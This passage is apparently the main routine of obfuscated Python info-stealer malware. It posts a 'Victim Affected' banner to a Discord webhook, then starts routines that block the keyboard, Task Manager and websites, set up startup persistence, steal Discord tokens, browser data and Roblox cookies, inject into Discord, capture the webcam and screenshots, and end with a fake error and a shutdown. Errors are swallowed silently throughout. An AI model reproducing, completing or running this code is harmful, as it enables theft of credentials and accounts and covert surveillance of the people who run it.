                OXGAFHVQQZNINCNHSSTWQYOXDBHCIFJDLRLWCCTDFJQLURWCQWMIHCAOOFWHSBTMPLBJYFJREVNIAGPRUIBXJGLWHHJQVSRPMBH.send(embed=WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP, username=XYWSUCNTVDRELXLGGAXRVIEJHNWCABPGRWDQPTYTNUJLCKTHNLKIAUVCRFTIGKWUWHTFCVUAJQZZJBMVCXFGCNWFLGWXDDKJXMAQ,
                                avatar_url=BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS)
                
    if not HXLZFRPFLTSEUHKXTZGLVOHMLUKEUAPVGBNLGPZOIKPELYPITJRFZGEDLQJA:
        OXGAFHVQQZNINCNHSSTWQYOXDBHCIFJDLRLWCCTDFJQLURWCQWMIHCAOOFWHSBTMPLBJYFJREVNIAGPRUIBXJGLWHHJQVSRPMBH = SyncWebhook.from_url(POGPJIKJLSDUWIJBOLHVUXUFHJRTVRAQQBFXVDXOXZNWARDZXNOXUEIVARZCHCRTLIIWXQFXXBZFDLIJVVFBREHREXDEEYLNBK)
        WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP = Embed(
            title=f'Roblox Cookie `{MGPUEEUVFJOISAIBQTFESNUOCQLQDXZGHNEBQRIAKUZTUDQTMNWZJETEHLHNGUNEFWNL} "{MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK}"`:', 
            description=f"No roblox cookie found.",
            color=BATBPWHEFJSZWBCVGSTISICSRWQWIOEFDRXZPQHHXLPQNRLTJJFCIYFQBOONGFRKIVAQVLYSKRITBCTICPSSTDKWWFRUNGX)
        WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP.set_footer(text=PXOFLNMLNUZLYFRLEJGFJNDTMYAGLOIMSULAOOADPDYRGWJYIXTURSPWIOCRQXSRODTFKVLTQKDRWHRICD, icon_url=BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS)
        OXGAFHVQQZNINCNHSSTWQYOXDBHCIFJDLRLWCCTDFJQLURWCQWMIHCAOOFWHSBTMPLBJYFJREVNIAGPRUIBXJGLWHHJQVSRPMBH.send(embed=WHYMNZYAHIOFGZBBRVWOQWSLHQBOQUZRLJHXRYAHNEGRFAVORBKYIGMTFMBVACVMNNUUSMQAPFMPWZGTMP, username=XYWSUCNTVDRELXLGGAXRVIEJHNWCABPGRWDQPTYTNUJLCKTHNLKIAUVCRFTIGKWUWHTFCVUAJQZZJBMVCXFGCNWFLGWXDDKJXMAQ, avatar_url=BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS)

try: requests.post(POGPJIKJLSDUWIJBOLHVUXUFHJRTVRAQQBFXVDXOXZNWARDZXNOXUEIVARZCHCRTLIIWXQFXXBZFDLIJVVFBREHREXDEEYLNBK, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': XYWSUCNTVDRELXLGGAXRVIEJHNWCABPGRWDQPTYTNUJLCKTHNLKIAUVCRFTIGKWUWHTFCVUAJQZZJBMVCXFGCNWFLGWXDDKJXMAQ, 'avatar_url': BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(POGPJIKJLSDUWIJBOLHVUXUFHJRTVRAQQBFXVDXOXZNWARDZXNOXUEIVARZCHCRTLIIWXQFXXBZFDLIJVVFBREHREXDEEYLNBK, json={'content': f'****╚══════════════════{MQEQNJOAZFPHLRCKPTVKLRPZHVTYQBXQBVGESUHGESEXQGLOJMKGHGCROGHHATRQPTLVYLXGSUOZVLGSAWJXDYYUGBIRQWSK}══════════════════╝****', 'username': XYWSUCNTVDRELXLGGAXRVIEJHNWCABPGRWDQPTYTNUJLCKTHNLKIAUVCRFTIGKWUWHTFCVUAJQZZJBMVCXFGCNWFLGWXDDKJXMAQ, 'avatar_url': BQZADZTSFONOFQNMWOYTXBOAEICLPOWLHZPNGDEJCUGWJTXAVMIVZNKHDABKVLFAPS})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
